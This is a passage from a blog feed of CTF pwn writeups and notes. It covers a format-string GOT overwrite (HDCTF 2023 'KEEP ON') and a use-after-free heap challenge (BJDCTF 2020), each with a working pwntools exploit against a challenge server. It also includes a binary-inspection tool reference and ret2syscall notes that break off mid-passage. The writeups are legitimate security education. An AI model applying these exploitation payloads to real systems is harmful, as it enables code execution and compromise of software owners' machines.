| **Handling memory leaks** | `b&apos;\xef\xbe...&apos;` (raw bytes) | `0xdeadbeef` (integer) | `u32()` / `u64()` |
| **Handling %p output** | `b&quot;0x7fff...&quot;` (text) | `0x7fff...` (integer) | `int(data, 16)` |
| **Fixing 6-byte addresses** | `b&apos;\x01...\x06&apos;` (6 bytes) | `0x000001...` (integer) | `u64(data.ljust(8, b&apos;\x00&apos;))` |
| **Finding a specific position** | Large chunk of junk data | Index of key data | `data.find(b&quot;key&quot;)` |

### Pitfall Notes
Another challenge that requires stack alignment.
### Pattern Recognition
PIE and canary are enabled, and there is an obvious stack overflow characteristic. At this point, you should think about how to read data from arbitrary addresses to build the conditions for our stack overflow.
## Related Challenges
None for now
## Extended Thoughts
None

---

_Created: 2025-12-15 18:12_</content:encoded></item><item><title>[HDCTF 2023]KEEP ON</title><link>https://goosequill.erina.top/en/blog/202512130011/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202512130011/</guid><description>Import notes for [HDCTF 2023]KEEP ON</description><pubDate>Fri, 12 Dec 2025 16:11:00 GMT</pubDate><content:encoded>&gt; [!note]
&gt; Related entry: [[PWN题目索引]]
&lt;progress value=&quot;100&quot; max=&quot;100&quot; style=&quot;width: 100%;&quot;&gt;&lt;/progress&gt;
# KEEP ON  - Challenge Writeup

&gt; [!info] Challenge Information
&gt; - **Competition**: HDCTF
&gt; - **Challenge**: KEEP ON 
&gt; - **Difficulty**: ★★★☆☆
&gt; - **Protection Mechanism**: NX
&gt; - **Vulnerability Type**: Format String
&gt; - **Exploitation Technique**: GOT overwrite

*Preface:*
This challenge is actually not difficult, and the intended path is very obvious. You can only succeed if not a single byte is wasted.
The reason I wanted to write a writeup for this challenge is that the writeups from other experts I saw all used the `fmtstr_payload()` function to construct an `printf()` arbitrary-address-write format string vulnerability. But since this was my first time working on an arbitrary-address-write vulnerability involving format strings, I wanted to try constructing it manually, so I wrote this review note. For reference by all the experts here.
## Vulnerability Analysis
`printf()` reads the `buf` that we can write to, which means we can supply our own format specifiers such as `%s %p %d %n` and so on.
First, use `%p.%p.%p.%p.....` to find the offset, then carefully craft the payload and use `%k$hhn` to overwrite the GOT entry address, replacing it with our `system@plt` address. Then, through the subsequent `read()` function overflow into `next rip`, return to our `vuln()` for a second payload.
Since the first payload has already changed `printf@got` ---&gt; `system@plt`, when we write **bin/sh\x00** into `buf`, what actually gets executed is `system(bin/sh)` to obtain a shell.
## Solution Steps
### ① Static Analysis
For the static analysis, I’ll note down the positions of the GOT and PLT in IDA here for convenience when we “handcraft” it in a moment.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512130052286.png)
As shown here, these are the basic things that should be in place.
```python
printf_got = 0x601028
system_plt = 0x4005E0
```
Now let’s begin. Our goal is to write `0x4005E0` into `0x601028` so that during the second payload, when `printf@plt` is called, it actually ends up calling `system@plt`.
#### Constructing an Arbitrary Address Write
To make the thought process clearer, let’s organize the target into a “task list”: (If you can’t understand this table, ask AI about little-endian concepts.)

| **Target Address (Address)** | **Target Byte (Hex)** | **Target Value (Decimal)** |
| ------------------ | -------------- | ------------------ |
| `0x601028`         | `E0`           | **224**            |
| `0x601029`         | `05`           | **5**              |
| `0x60102A`         | `40`           | **64**             |

But if we handcraft it in the order above, it will lead to the problem of an overly long string. For example, if we write them in order, the first one is `%224c%k$hhn`.
Since 1 byte = 8 bit ---&gt; maximum is $2^8 -1 = 255$, then for `256 = 0`, the next one would be `%6c%k$hhn`.
The last one would be `%59c%k$hhn`. This would make the value of m in `%mc` too large, which is not very efficient, so we usually construct it from small to large:

So we write them in the order `0x601029` `0x60102A` `0x601028`.
The corresponding padding sizes are: `%5c` `%59c`  `%160c`
Next, we need to know that the standard structure of an arbitrary address write is:
\[ format string part ] \[ padding characters ] \[ address1 ] \[ address2 ] \[ address3 ]
Through dynamic debugging, we know that the basic offset is: **6** (the dynamic debugging section will record this).
So the \[ format string part ] is: `%5c%11$hhn%59c%12$hhn%160c%13$hhn`
How do we get `k`? We can simply count the length: 33 bytes (hint: `%`, `c`, `$`, `h`, `n`, and digits each count as 1 byte)
According to 8-byte stack alignment, \[ padding characters ] = $40 - 33 = 7$
Accordingly, \[ address1 ] \[ address2 ] \[ address3 ] can only be placed at offsets 40, 48, and 56, and the corresponding stack frame diagram is as follows:
```txt
[ 栈生长方向：高地址 -&gt; 低地址 ]
      
Offset |  内存内容 (Memory Content)               |  解释
-------|------------------------------------------|-------------------------
 ...   |  (寄存器中的参数 RDI~R9 对应 Offset 1-5) | 
-------|------------------------------------------|-------------------------
       |                                          | &lt;--- 这里的内存地址是 payload 起点
 6$    | &quot;%5c%11$&quot; (8 bytes)                      | 格式化字符串 第 1 部分
-------|------------------------------------------|-------------------------
 7$    | &quot;hhn%59c%&quot; (8 bytes)                     | 格式化字符串 第 2 部分
-------|------------------------------------------|-------------------------
 8$    | &quot;12$hhn%1&quot; (8 bytes)                     | 格式化字符串 第 3 部分
-------|------------------------------------------|-------------------------
 9$    | &quot;60c%13$h&quot; (8 bytes)                     | 格式化字符串 第 4 部分
-------|------------------------------------------|-------------------------
 10$   | &quot;hnaaaaaa&quot; (8 bytes)                     | 格式化字符串结尾 + 填充 (Padding)
-------|------------------------------------------|-------------------------
       |  ========== 分界线 ==========            | 上面正好 5 个格子 (5 * 8 = 40 bytes)
-------|------------------------------------------|-------------------------
 11$   |  \x29\x10\x60\x00\x00\x00\x00\x00        | &lt;--- 目标地址 1 (0x601029)
-------|------------------------------------------|-------------------------
 12$   |  \x2A\x10\x60\x00\x00\x00\x00\x00        | &lt;--- 目标地址 2 (0x60102A)
-------|------------------------------------------|-------------------------
 13$   |  \x28\x10\x60\x00\x00\x00\x00\x00        | &lt;--- 目标地址 3 (0x601028)
-------|------------------------------------------|-------------------------
```
At this point, I believe I’ve explained it clearly enough, but this payload is wrong ❌
However, so as not to confuse everyone at the beginning, the later Pitfall Notes section will explain how we discovered it was wrong and why it needed to be modified that way. Here I’ll just put the correct payload directly. If you can understand it immediately, then there’s no need to read my rambling there.
`%11$n%5c%12$hhn%59c%13$hhn%160c%14$hhnaa[0x60102B] [0x601029] [0x60102A] [0x601028]`
### ② Dynamic Debugging  
To find the offset, you only need to write a lot of `%p` and then observe. I’ll just write 8 of them here.
```python
%p.%p.%p.%p.%p.%p.%p.%p
#断点下在0x4007c8
b *0x4007c8
start
c
#输入上面呢串
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131033755.png)
To make it easier to show in one image, I reversed the concatenation of the two lines here, but it should still be clear. The upper one is the echo. Let’s analyze the part marked by the green box. You can see this is the result of the 6th `%p`. Although it is not a stack address, we notice the repeated characters `0x70252e`, so we suspect it is the ASCII code of `%p.`. As a result, viewed in little-endian, it is `\x2e -&gt; . \x25 -&gt;% \x70 -&gt; p`, from which we determine that the offset is 6.
There isn’t much else that needs dynamic debugging here, so I plan to focus the discussion in the Pitfall Notes section.

### ③ Exploit Development
```python
from pwn import *
# io = process(&apos;./hdctf&apos;)
io = remote(&apos;node4.anna.nssctf.cn&apos;, 28306)
elf = ELF(&apos;./hdctf&apos;)
context(arch=&apos;amd64&apos;, os=&apos;linux&apos;, log_level=&apos;debug&apos;)

io.recvuntil(b&apos;name: \n&apos;)
printf_got = elf.got[&apos;printf&apos;]
system_plt = elf.plt[&apos;system&apos;]
vuln = elf.sym[&apos;vuln&apos;]
a = input()
payload = fmtstr_payload(6, {printf_got: system_plt})
payload = b&apos;%11$n%5c%12$hhn%59c%13$hhn%160c%14$hhnaa\x2B\x10\x60\x00\x00\x00\x00\x00\x29\x10\x60\x00\x00\x00\x00\x00\x2A\x10\x60\x00\x00\x00\x00\x00\x28\x10\x60\x00\x00\x00\x00\x00&apos;
io.send(payload)

payload_ret = b&apos;A&apos; * (0x50 + 0x08) + p64(vuln)
io.recvuntil(b&apos;keep on !\n&apos;)
io.send(payload_ret)
io.recvuntil(b&apos;name: \n&apos;)
# io.interactive()
io.send(b&apos;/bin/sh\x00&apos;)

io.interactive()
```
Here I handwrote the payload in little-endian form, so you can also write it in another form:
```python
payload = b&apos;%11$n%5c%12$hhn%59c%13$hhn%160c%14$hhnaa&apos;
payload += p64(0x60102B)
payload += p64(0x601029)
payload += p64(0x60102A)
payload += p64(0x601028)
```
### ④ Final Exploit
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131042547.png)

## Tools Used
IDA, pwndbg, readelf
## Key Takeaways
I learned the construction method and thought process for `fmtstr_payload()`.
### Technical Insight
When you encounter a problem, make sure to use dynamic debugging to see whether the actual changes match what you had in mind!
### Pitfall Notes
Let me record here why the first payload we painstakingly constructed was wrong. We might as well follow the original idea: first check whether it is arranged correctly on the stack, and if it is, then check whether the write succeeds by comparing the state before and after writing. In this way, we can discover where the problem lies.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131051710.png)
This image shows it in great detail. Let’s look at the changed `printf@got` address.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131052315.png)
Look carefully: the arbitrary address write vulnerability was successfully executed, but unfortunately the higher bytes were not zeroed out! This caused address resolution to fail.

| **Byte Offset**  | **+0**   | **+1**   | **+2**   | **+3**   | **+4**   | **+5**   | **+6** | **+7** |
| --------- | -------- | -------- | -------- | -------- | -------- | -------- | ------ | ------ |
| **Original Value**  | `00`     | `01`     | `26`     | **`80`** | **`74`** | **`70`** | `00`   | `00`   |
| **What We Modified** | `E0`     | `05`     | `40`     | (untouched)    | (untouched)    | (untouched)    | (untouched)  | (untouched)  |
| **Resulting Value** | **`E0`** | **`05`** | **`40`** | **`80`** | **`74`** | **`70`** | `00`   | `00`   |

Therefore, the high bytes of the address need to be fully cleared. Here, we only need to clear 3 bytes. Since `%hn` writes 2 bytes and `%n` writes 4 bytes, we use `%n` here to zero out `0x60102B`.
```
part1 = &quot;%11$n&quot;        # 5 bytes (Writes 0 to 0x60102B)
part2 = &quot;%5c%12$hhn&quot;   # 10 bytes (Writes 0x05)
part3 = &quot;%59c%13$hhn&quot;  # 11 bytes (Writes 0x40)
part4 = &quot;%160c%14$hhn&quot; # 12 bytes (Writes 0xE0)

# 总长度 = 5 + 10 + 11 + 12 = 38 bytes ---&gt; [ padding ] = 2 bytes
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131059426.png)

Also, when testing in a local environment, everyone should note that it won’t work locally.
- **Instruction:** `movaps` is an instruction for handling SIMD (Single Instruction Multiple Data), commonly used to accelerate memory copying.    
- **Rigid rule:** This instruction **strictly requires** the memory address being operated on to be a **multiple of 16** (that is, the last digit of the address must be `0`).
- **Current situation:**
    - `RSP` (stack pointer) is `0x7ffef12d4cc8` (ending in **8**).
    - `RSP + 0x50` is `0x7ffef12d4d18` (ending in **8**).
    - **8 is not a multiple of 16** → **BOOM! 💥**
        

**Why does this happen?** This is a common phenomenon in GLIBC on Ubuntu 18.04 and later. The `system` function internally uses `movaps` for performance optimization. In a normal program call, the compiler ensures that the stack is aligned when entering the function. However, because we forcibly changed `printf` into `system` using **GOT Hijack**, we skipped the normal function prologue preparation, causing the stack to be off by exactly 8 bytes when entering `do_system`.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131104796.png)
The remote server does not require stack alignment.
### Pattern Recognition
Did not disable `%n` `%hn` `%hhn`
The challenge involves writing `buf` and then `printf(buf)` behavior

## Related Challenges
None
## Further Thoughts
This challenge is too rigidly designed; there is one and only one solution path. The author’s control over every byte is extremely precise, not wasting even a single extra byte.

---

_Created: 2025-12-13 00:16_</content:encoded></item><item><title>[BJDCTF 2020]YDSneedGirlfriend</title><link>https://goosequill.erina.top/en/blog/202512102100/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202512102100/</guid><description>Import notes for [BJDCTF 2020]YDSneedGirlfriend</description><pubDate>Wed, 10 Dec 2025 13:00:00 GMT</pubDate><content:encoded>&gt; [!note]
&gt; Related entry: [[PWN题目索引]]

# YDSneedGirlfriend - Challenge Writeup
&gt; [!info] Challenge Information
&gt; - **Contest**: BJDCTF 2020
&gt; - **Challenge**: YDSneedGirlfriend
&gt; - **Difficulty**: ★★★☆☆
&gt; - **Protection**: Full protection
&gt; - **Vulnerability Type**: UAF
&gt; - **Exploitation Technique**: Heap exploitation

## Vulnerability Analysis
This challenge was quite mind-bending for a beginner like me... but I still managed to understand it. After understanding it, it felt quite simple, so I want to record how I gradually worked through and understood it.
This challenge directly calls `**(&amp;girlfriendlist + idx))` through the `print_gerlfriend()` function, while in the `del_girlfriend()` function it **only does free() without nulling the pointer!**
This allows us to exploit a **Use After Free** vulnerability.
There is no edit functionality in this challenge, so we have to find a way to &lt;mark&gt;create&lt;/mark&gt; modification logic. How? By relying on fast_bins.
Suppose there is a linked list like this:
chunk_struck\[0x20\]   : chunk_B -&gt; chunk_A -&gt; NULL   (this fast_bin stores freed struct chunks)
We know `print_gerlfriend()` will call to create indexed chunks (even if they have already been freed!!!), so now there are two freed struct chunks in the fast_bin. If at this point we `add(0x10)`, the malloc mechanism will give us these two chunks of size = 0x20. Note that at this point the new struct chunk_C -&gt; chunk_B (struct), while the **data chunk_C -&gt; chunk_A (struct)**
Do you see it? We can modify the function pointer in chunk_A now! Change it to our backdoor function, and when we `print_gerlfriend()` again, it will trigger our backdoor function!
If this part is hard to understand, you can finish reading the detailed analysis below and then come back to this core part. Here is an image from another expert&apos;s writeup; it is really well made.
![image](https://www.nssctf.cn/files/2024/6/3/296093a37b.jpg)
## Solution Steps
### ① Static Analysis
First is an in-depth analysis of the `add()` function to understand the full picture of the chunk structure.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102156116.png)
I drew this in great detail. In general, two chunks are created: one can be understood as a struct chunk, size = 0x10, which stores the `print_girlfriend_name()` function address, and then stores the address of the name data chunk, whose size can be chosen freely. The blue line here indicates that these two chunks are adjacent, though I drew them far apart for clarity of logic. In terms of malloc memory management, they are adjacent (in this situation).
Now let&apos;s look at where the vulnerability is found, `del_girlfriend()`
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102211974.png)
At this point, let&apos;s do some dynamic debugging with gdb and see how our initial core idea appears on the heap.
### ② Dynamic Debugging  
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102253517.png)
The screenshot above is taken at the point where execution breaks on add(chunk_A);add(chunk_B); Next, I will free these two chunks and focus on the linked-list structure of fast_bins.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102309368.png)
Now we can revisit our initial core idea. Combined with the diagram at the beginning, it becomes clear how this challenge exploits the **Use After Free** vulnerability.
### ③ Exploit Development
```python
from LibcSearcher import*
context(arch = &apos;amd64&apos;, os = &apos;linux&apos;, log_level = &apos;debug&apos;)
context.terminal = [&apos;tmux&apos;,&apos;splitw&apos;,&apos;-h&apos;]
#io = process(&apos;./pwn&apos;)
io = remote(&apos;node4.anna.nssctf.cn&apos;,28485)
s   = lambda content : io.send(content)
sl  = lambda content : io.sendline(content)
sa  = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc  = lambda number : io.recv(number)
ru  = lambda content : io.recvuntil(content)
def slog(name, address): io.success(name+&quot;==&gt;&quot;+hex(address))
def debug(): gdb.attach(io)
def add(size,name):
    sla(&quot;:&quot;, &apos;1&apos;)
    sla(&quot; :&quot;, str(size))
    sla(&quot; :&quot;, name)
def delete(index):
    sla(&quot;:&quot;, &apos;2&apos;)
    sla(&quot; :&quot;, str(index))
def show(index):
    sla(&quot;:&quot;, &apos;3&apos;)
    sla(&quot; :&quot;, str(index))
def take(index, content):
    sla(&quot;:\n&quot;, &apos;4&apos;)
    sla(&quot;modify :&quot;, str(index))
    sa(&quot;content\n&quot;, content)
    
backdoor = 0x400baa
add(0x10, &apos;aaaaaaaa&apos;) #chunk_A
add(0x20, &apos;bbbbbbbb&apos;) #chunk_B
delete(0)
delete(1)

add(0x10, p64(backdoor))
show(0)
io.interactive()
```
### ④ Final Exploit
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102312135.png)

## Tools Used
IDA, pwngdb

## Key Takeaways
### Technical Insights
This is the second heap challenge I have done. Based on my current experience, it is important to carefully analyze how the `add()` function adds heap chunks. Also, for cases that like to place function pointers inside heap chunks, pay attention to whether the `del()` function nulls the pointer and whether the `show()` function directly calls the function pointer at that location. These are all very dangerous behaviors.
### Pitfalls Encountered
I did not explain the `print_gerlfriend()` function in detail earlier, so let&apos;s study it carefully here. This was a first for me.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102319244.png)
Focus on `(**(&amp;girlfriendlist + idx))(*(&amp;girlfriendlist + idx));`
According to C language rules:
- `*(&amp;girlfriendlist + idx)` dereferences → `girlfriendlist[idx]` → chunk pointer
- `**(&amp;girlfriendlist + idx)` dereferences again → `(chunk)[0]` → function pointer
- The call form is `func(chunk)` → RDI = chunk

So what is passed is the &quot;pointer to the struct itself&quot;.
At first I was confused here. Since the pointer to name_data is stored in the immediately adjacent next slot, why doesn&apos;t (&amp;girlfriendlist + idx) continue with +8?
Actually, the logic is written inside the function. A glance at `print_girlfriend_name` makes it clear.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102323584.png)

### Pattern Recognition
The `del()` function has pointer-nulling behavior.
## Related Challenges
None for now
## Further Thoughts
This challenge is quite rigid, and it also does not provide the `edit()` function, so there is no way to modify the function pointer through heap overflow. There are not really any other ideas.

---

_Created: 2025-12-10 21:02_</content:encoded></item><item><title>Binary File Information Gathering Tools</title><link>https://goosequill.erina.top/en/blog/202512020527/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202512020527/</guid><description>Import notes for Binary File Information Gathering Tools</description><pubDate>Tue, 02 Dec 2025 14:05:00 GMT</pubDate><content:encoded>##  Binary File Information Gathering Tools
&lt;progress value=&quot;50&quot; max=&quot;100&quot; style=&quot;width: 100%;&quot;&gt;&lt;/progress&gt;
## Overview
To do a good job, one must first sharpen one&apos;s tools. In the process of binary code analysis, it is necessary to use some tools to collect information about binary code.
This article is used to record some command-line tools for inspecting binary file information. It will include: `nm` , `ldd` , `strings` , `ps` , `strace` , `ltrace` , `ROPgadget` , `objdump` , `readelf`, mainly documenting some potentially useful parameters and explanations of their output.
## Tool List
### nm
`nm` is used to inspect the symbol table in a binary file, including functions, global variables, undefined symbols, and so on. In exploit development and reverse engineering, it can be used to find function addresses, determine whether symbols have been stripped, analyze linking, and more.
#### Common Parameters
- `nm &lt;file&gt;`  
    View the file&apos;s symbol table (by default showing only **symbol name + type + address**).
- `nm -D &lt;file&gt;`  
    View the **dynamic symbol table** (.dynsym), suitable for ELF shared libraries and dynamically linked executables.
- `nm -g &lt;file&gt;` 
    Show only **global symbols**.
- `nm -a &lt;file&gt;`  
    Show all symbols, including debug symbols.
- `nm -S &lt;file&gt;`  
    Show symbol sizes (the Size field).
- `nm -u &lt;file&gt;`  
    Show only **undefined symbols**, which are usually dynamic linking dependencies.
- `nm --no-sort &lt;file&gt;`  
    Output symbols in their original order (without sorting by address).

#### Common Symbol Type Descriptions
The second column in `nm` output is the symbol type (section type), and the common meanings are as follows:
![image.png|579](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512022258833.png)

| Letter        | Meaning                                    |
| --------- | ------------------------------------- |
| **T / t** | Symbol in the Text section (code section) (T = global, t = local) |
| **D / d** | Symbol in the Data section                            |
| **B / b** | BSS section (uninitialized data) symbol                       |
| **R / r** | Read-only data section symbol                               |
| **U**     | Undefined symbol (requires an external library to resolve)       |
| **W / w** | Weak symbol                      |
| **A**     | Absolute symbol (address does not change during linking)        |
| **V / v** | Weak object                      |

&gt; In PWN, the most commonly used ones are:  
&gt; **T/t**: find function locations  
&gt; **U**: determine linking dependencies  
&gt; **B/D**: analyze global variables and GOT/data structure locations

### ldd
`ldd` is used to inspect which **shared libraries** an ELF executable will load at runtime, as well as the actual resolved path and base address (load address) of each library. In exploit development, &lt;font color=&quot;#e36c09&quot;&gt;it is used to determine the libc version, check whether a custom loader is used, and identify whether there is a controllable library hijacking scenario.&lt;/font&gt;

#### Common Parameters
- `ldd &lt;file&gt;`  
    View the list of runtime dynamic library dependencies for an ELF file; this is the most commonly used form.
- `LD_TRACE_LOADED_OBJECTS=1 &lt;file&gt;`  
    Equivalent to `ldd`, &lt;span style=&quot;background:#fdbfff&quot;&gt;but does not actually run the target program, making it safer.&lt;/span&gt;

&gt; ⚠️ **Note:** In some cases, `ldd &lt;file&gt;` may actually “execute” the ELF file&apos;s initialization logic, so caution is required when using it on malicious samples.  
&gt; Recommended usage:
&gt; `LD_TRACE_LOADED_OBJECTS=1 ./executable

#### Output Example and Explanation
```bash
$ ldd ./pwn         
linux-vdso.so.1 (0x00007fffffffe000)         
libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7a0d000)         
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd0000)
```
Field meanings:
- `linux-vdso.so.1`: a virtual dynamic shared object provided by the kernel, not a real file
- `libc.so.6 =&gt; /lib/.../libc.so.6`  
    the actual resolved path of the shared library
- `(0x00007ffff7a0d000)`  
    the runtime load base address (randomized on each launch under ASLR)

#### Common Uses in PWN
- **Confirm the libc version**  
    In exploit development, you must know the libc version to match the correct offsets.

- **Confirm whether the program uses its bundled libc**  
    For example:    
    `libc.so.6 =&gt; ./libc-2.31.so`
    This indicates that a dedicated libc is placed in the program directory (common in challenges).
- **Check the program&apos;s loader/dynamic linker**
    `[Requesting program interpreter: ./ld-2.31.so]`
    → Combine with `readelf -l` (mentioned later) for further confirmation.
- **Debug path issues**  
    When &quot;not found&quot; appears, it can be used to analyze issues such as incorrect `LD_LIBRARY_PATH` configuration.
    
- **Library Hijacking analysis**  
    It can be used to determine whether there is an opportunity to exploit RPATH, RUNPATH, or LD_PRELOAD.
    

#### Common Error Messages
1. **not found**
    `libmylib.so =&gt; not found`
    This indicates that the system cannot resolve the library, usually due to a path issue.
    
2. **statically linked**
    `not a dynamic executable`
    This indicates that the ELF uses &lt;mark style=&quot;background: #fa5d19;&quot;&gt;static linking&lt;/mark&gt; (such as musl builds), so dependencies cannot be inspected with ldd.
### strings
`strings` is used to extract printable strings (ASCII/UTF-8) from binary files, including program string literals, logs, commands, paths, format strings, and so on. In exploit development, it is often used to **quickly locate** key function names, debug information, sensitive paths, and flag clues.
#### Common Parameters
- `strings &lt;file&gt;`  
    Scan the entire file for printable strings; the most commonly used form.
- `strings -n &lt;num&gt;`  
    Set the minimum string length (default is 4).  
    For example: `strings -n 3 a.out`
- `strings -d &lt;file&gt;`  
    Extract strings only from the **data section**.
- `strings -e &lt;enc&gt;`  
    Specify the encoding (such as s=7bit, S=8bit, b=big-endian, l=little-endian).
- `strings -t x &lt;file&gt;`  
    Display the offset of the string in the file before outputting it (hexadecimal).  
    Commonly used to &lt;span style=&quot;background:#d2cbff&quot;&gt;locate string positions&lt;/span&gt; together with reverse engineering.

#### Common Output Type Descriptions
The information that `strings` can extract includes but is not limited to:

|String Type|Example|Use|
|---|---|---|
|Debug information|`&quot;Enter password:&quot;`|Quickly locate logic points|
|Path|`&quot;/bin/sh&quot;`|Clues for RCE / system exploitation|
|Format string|`&quot;%p %s %n&quot;`|Identify format string vulnerabilities|
|Error / log|`&quot;invalid length&quot;`|Cross-reference with the reversing process|
|Linked library name|`&quot;GLIBC_2.31&quot;`|Identify libc version|
|Compiler information|`&quot;GCC: (Ubuntu 9.4.0-1)&quot;`|Determine the competition environment|

#### Example Output Explanation
```bash
$ strings ./pwn
/bin/sh
Enter your input:
Correct!
GLIBC_2.31
puts
system
```
Analysis:
- `/bin/sh` → If this string appears in the program, there may be a call related to system(&quot;/bin/sh&quot;)
- `Enter your input:` → Program I/O stream, corresponding to behavior
- `GLIBC_2.31` → **libc version signature** (extremely important)
- `puts`, `system` → Dynamically linked symbol names, which can be combined with leaks to build ROP

#### Common Uses in PWN
- **Search for the &quot;/bin/sh&quot; string**  
    In ROP vulnerabilities, this is used to find the offset of `/bin/sh` built into libc or the binary.
- **Identify potentially dangerous API calls**  
    Such as: `system`, `sprintf`, `strcpy`, `gets`, etc. → suggesting potential vulnerability points.
- **Find evidence of format string vulnerabilities**  
    If outputs like `&quot;%x&quot;`, `&quot;%p&quot;`, `&quot;%n&quot;` appear, they can be further analyzed.
- **Quickly locate logic flow**  
    Determine program behavior through strings such as `&quot;Wrong password&quot;` and `&quot;Try again&quot;`.
- **Confirm libc version signatures**  
    If the output contains many `GLIBC_2.xx` strings, they can be used to narrow down the libc version.
- **Assist reverse engineering**  
    Corresponding strings → use IDA/objdump to trace references back and locate key functions.
### readelf
`readelf` is one of the most comprehensive and professional tools for reading ELF format information. It parses ELF structures directly without depending on the system environment. Compared with `objdump`, `readelf` is more focused on data presentation, produces more precise output, and is better suited for binary analysis.

It is commonly used to inspect: program headers, section headers, dynamic information, symbol tables, relocation tables, program headers, interpreters (loaders), and more.

---

#### Common Parameters

- `readelf -h &lt;file&gt;`  
    View the ELF file header (ELF type, architecture, entry address, etc.).
    
- `readelf -l &lt;file&gt;`  
    View the **Program Headers**, including load addresses, dynamic segments, and interpreter information.
    
- `readelf -S &lt;file&gt;`  
    View the **section headers**, which can be used to locate .text/.data/.got/.plt, etc.
    
- `readelf -s &lt;file&gt;`  
    View the symbol table (dynamic symbols + static symbols).
    
- `readelf -r &lt;file&gt;`  
    View the relocation table (essential for learning ROP), such as `.rela.plt`.
    
- `readelf -d &lt;file&gt;`  
    View the dynamic segment (DT_NEEDED, RPATH, RUNPATH, SONAME, etc.).
    
- `readelf -a &lt;file&gt;`  
    Output all information.

---

#### Output Content Explanation (Key Fields)
##### 1. ELF header (`-h`)
```
Entry point address:               0x401080
Type:                              EXEC (Executable file)
Machine:                           Advanced Micro Devices X86-64
```
- Entry address (possibly useful for ret2text)
- ELF type (EXEC / DYN → PIE determination)
- Architecture (64bit/32bit)
Determine whether PIE is enabled:

```
Type:    DYN → PIE 开启
Type:    EXEC → PIE 关闭
```

---

##### 2. Program Headers (`-l`)

```
LOAD           0x000000 0x400000 0x400000 0x2000 ...
INTERP         /lib64/ld-linux-x86-64.so.2
DYNAMIC        0x401dd0 ...
GNU_RELRO      0x401000 ...
```
Key fields:
- **INTERP**: shows the loader (ld.so)  
    → Combine with ldd to confirm whether a bundled loader is used
- **LOAD**: load segment addresses, reflecting the memory layout  
    → For ret2text, pay attention to the starting address of executable segments
- **GNU_RELRO / GNU_STACK**:  
    → Used to determine protections: RELRO, NX, and whether STACK protections are enabled
##### 3. Section Headers (`-S`)
Mainly used to locate key sections:
```
.text     可执行代码区域
.data     可写数据
.bss      未初始化变量
.plt      Procedure Linkage Table
.got      Global Offset Table
.got.plt  延迟绑定 GOT
.init_array 程序启动时调用（构造函数）
.fini_array 程序退出时调用（析构函数）
```
In PWN:
- `.plt` is used for ROP calls to functions such as puts/printf
- `.got` is used for leaking addresses (GOT overwrite)
- `.fini_array` is used to control the program execution flow --&gt; [[[CISCN 2019 Southwest]PWN1]]
##### 4. Symbol Table (`-s`)
Example:
```
0000000000401030  system@plt
0000000000401040  puts@plt
0000000000404020  __libc_start_main
```
Uses:
- Find actual function / plt locations
- Determine whether certain functions are exported (for example, if there is no system@plt → ret2libc must leak libc)
- Reverse engineer to find function names

Statically linked files will show a large number of symbols here.
##### 5. Dynamic Segment (`-d`)
Example:
```
(NEEDED)             Shared library: [libc.so.6]
(RPATH)              Library rpath: [/home/pwn/lib]
(INTERP)             Program interpreter: ./ld-2.31.so
```
Uses in PWN:
- **Determine the libraries the program depends on** (cross-check with ldd)
- Whether RPATH/RUNPATH can be exploited to hijack libraries
- Whether a custom loader is used (some challenges use `./ld-2.xx.so`)
##### 6. Relocation Table (`-r`)
```
000000404018  R_X86_64_JUMP_SLOT   puts@GLIBC_2.2.5
```
Uses in PWN:
- `.rela.plt`/`.plt.got` → delayed binding mechanism analysis
- Understand the GOT structure for leaking libc addresses
#### Common Uses in PWN (Summary)
- **Determine protections such as PIE / NX / RELRO**  
    (ELF header + Program headers)
    
- **Locate GOT / PLT**  
    Used for ret2plt / address leaks
    
- **View the loader (interpreter)**  
    Determine whether bundled ld is needed for debugging
    
- **Confirm dynamic library dependencies, RPATH/RUNPATH**  
    Used for library hijacking exploitation
    
- **View the symbol table**  
    Determine functions that can be directly used in ROP (such as whether system@plt exists)
    
- **Locate the entry point, segment offsets, and code layout**  
    Used to construct attack payloads</content:encoded></item><item><title>ret2system</title><link>https://goosequill.erina.top/en/blog/202511301655/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511301655/</guid><description>Import notes on ret2system</description><pubDate>Sun, 30 Nov 2025 07:16:00 GMT</pubDate><content:encoded>## ret2syscall Exploitation Notes (for x86_64 Linux)


### Basic Concept
ret2syscall is a ROP technique that directly invokes Linux kernel syscalls by controlling registers and then triggering the `syscall` instruction.
Common uses:
- Call `execve(&quot;/bin/sh&quot;, 0, 0)` to get a shell

- Call `open/read/write` to read files    
- Sometimes used to exit the program (exit)

The advantage of ret2syscall is:  
**No libc required, no system required; only a syscall instruction somewhere in the program is needed.**
### syscall Calling Convention (x86_64)
Under Linux, syscalls pass arguments through the following registers:

|Function|Register|
|---|---|
|Syscall number|rax|
|1st argument|rdi|
|2nd argument|rsi|
|3rd argument|rdx|
|4th argument|r10|
|5th argument|r8|
|6th argument|r9|

To trigger a syscall, you must execute:
```
syscall
```
Common syscall IDs:

|Syscall|Number|
|---|---|
|execve|59|
|open|2|
|read|0|
|write|1|

The most common setup is:
```bash
execve(&quot;/bin/sh&quot;, 0, 0)
```
Corresponding registers:
```bash
rax = 59
rdi = &quot;/bin/sh&quot; 地址
